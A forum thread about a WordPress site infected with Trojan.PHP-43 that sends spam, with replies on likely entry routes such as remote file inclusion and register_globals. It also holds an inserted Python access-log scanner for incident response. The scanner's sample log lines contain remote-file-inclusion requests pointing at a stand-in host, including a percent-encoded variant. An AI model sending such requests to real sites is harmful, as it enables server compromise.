Security help Trojan.PHP-43


2 replies to this topic

#1 Johnnyboy69

Johnnyboy69

    Newbie

  • Members
  • 8 posts

Posted 05 February 2013 - 02:18 AM

Hi all. Was hoping for some advice on the following. A client has provided me with a website that has recently been hacked. Apparently, specifically the mail server aspect of the site has been influenced, causing the site to send out spam mail. The following Trojan was found in 4 files of the site: Trojan.PHP-43. Files that were influenced were mostly wp-conf.php and 2 mail php scripts. Does anyone have knowledge or experience with this Trojan or any tips that could help me resolve this? Also, any pointers on aspects of the site that will need to be improved in order to prevent this, i.e., what weaknesses of a site are normally exploited for this kind of Trojan to breach it? Thank you in advance.

#2 PFMaBiSmAd

PFMaBiSmAd

    Advanced Member

  • Staff Alumni
  • 16,767 posts
  • Location: Colorado, U.S.A.

Posted 05 February 2013 - 06:14 AM

The issue isn't directly with the Trojan script itself, it's how the Trojan script was placed onto the server.

Some php code was either uploaded, remotely included, or injected into eval'ed content and then executed on the server or an admin password for an application/control panel/ftp was guessed and directly allowed php code to be put onto the server. The original loader script then read and put the Trojan script onto the server. You would need to find the exact method that was used to get the original loader code onto the server and close the hole that allowed it. The web server access log file and any application/control panel/ftp/sql query log files would be the best places to start looking.

Given the name of the Trojan, it's likely that the method of getting it onto the server involved a remotely included file in conjunction with php's register_globals being ON and an older php application that wasn't secure.

Edited by PFMaBiSmAd, 05 February 2013 - 06:18 AM.

Signature: (not a comment about anything you posted unless specifically indicated)
Debugging step #1: To get past the garbage-out equals garbage-in stage in your code, you must check that the inputs to your code are what you expect.

Programming is just problem solving, but it is done in another language. You must learn enough of the programming language you are using to be able to read and write code.
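As an added example (not code from the thread or from either poster), the script below applies the advice in the reply above to a web server access log. It parses combined-format lines, flags requests whose query-string parameters carry an absolute http/https/ftp URL (the remote-include pattern the reply points to), and flags direct requests to files reported as infected. The log lines are constructed for the example; the watched-path list assumes only wp-conf.php, since the thread does not name the two mail scripts. Percent-encoded values are decoded before the check, so an encoded scheme is caught as well.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A query-string value with one of these schemes points at a remote file.
REMOTE_SCHEMES = {"http", "https", "ftp"}

# Files from the thread that a visitor should never request directly.
# Assumption: only wp-conf.php is named; the two mail scripts are not.
WATCHED_PATHS = {"/wp-conf.php"}

# Constructed sample log lines (RFC 5737 test addresses), not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2013:23:41:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2013:23:41:09 +0000] "GET /index.php?page=http://198.51.100.9/l.txt? HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2013:23:41:15 +0000] "GET /view.php?inc=hTTp%3A%2F%2F198.51.100.9%2Fl.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [04/Feb/2013:23:42:30 +0000] "POST /wp-conf.php HTTP/1.1" 200 44 "-" "-"
192.0.2.5 - - [04/Feb/2013:23:43:01 +0000] "GET /contact.php HTTP/1.1" 200 2210 "http://example.com/" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target):
    """Return (name, value) pairs whose decoded value is an absolute remote URL."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
    for name, value in parse_qsl(query, keep_blank_values=True):
        # urlsplit lowercases the scheme, so mixed-case schemes are caught too.
        if urlsplit(value.strip()).scheme in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits


def scan_access_log(text, watched_paths=frozenset()):
    """Return a list of findings, one dict per indicator, in log order."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        rec = parse_line(raw)
        if rec is None:
            # A line the parser cannot read still deserves a look.
            findings.append({"line": lineno, "ip": None,
                             "indicator": "unparsed", "detail": raw})
            continue
        for name, value in remote_url_params(rec["target"]):
            findings.append({"line": lineno, "ip": rec["ip"],
                             "indicator": "remote-include",
                             "detail": f"{name}={value}"})
        path = urlsplit(rec["target"]).path
        if path in watched_paths:
            findings.append({"line": lineno, "ip": rec["ip"],
                             "indicator": "watched-file",
                             "detail": f"{rec['method']} {path} -> {rec['status']}"})
    return findings


def suspect_ips(findings):
    """Distinct client addresses behind the findings, for pivoting to other logs."""
    return sorted({f["ip"] for f in findings if f["ip"]})


if __name__ == "__main__":
    results = scan_access_log(SAMPLE_LOG, WATCHED_PATHS)
    for f in results:
        print(f"line {f['line']:>3}  {f['ip'] or '-':<15} {f['indicator']:<15} {f['detail']}")
    print("pivot on:", ", ".join(suspect_ips(results)))
```

The addresses it returns are the ones to look for next in the FTP, control-panel and SQL logs the reply lists, and the timestamps of the flagged lines bound the window in which the loader was fetched.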

#3 KevinM1

KevinM1

    Snarkimus Prime

  • Moderators
  • 5,217 posts
  • Location: New Hampshire, USA

Posted 05 February 2013 - 07:56 AM

Files that were influenced were mostly wp-conf.php and 2 mail php scripts. Does anyone have knowledge or experience with this Trojan or any tips that could help me resolve this? Also, any pointers on aspects of the site that will need to be improved in order to prevent this, i.e., what weaknesses of a site are normally exploited for this kind of Trojan to breach it? Thank you in advance.


Don't use WordPress. It's notoriously bad with security, especially if it's not up-to-date and if you're relying on plugins to do most of the heavy lifting.



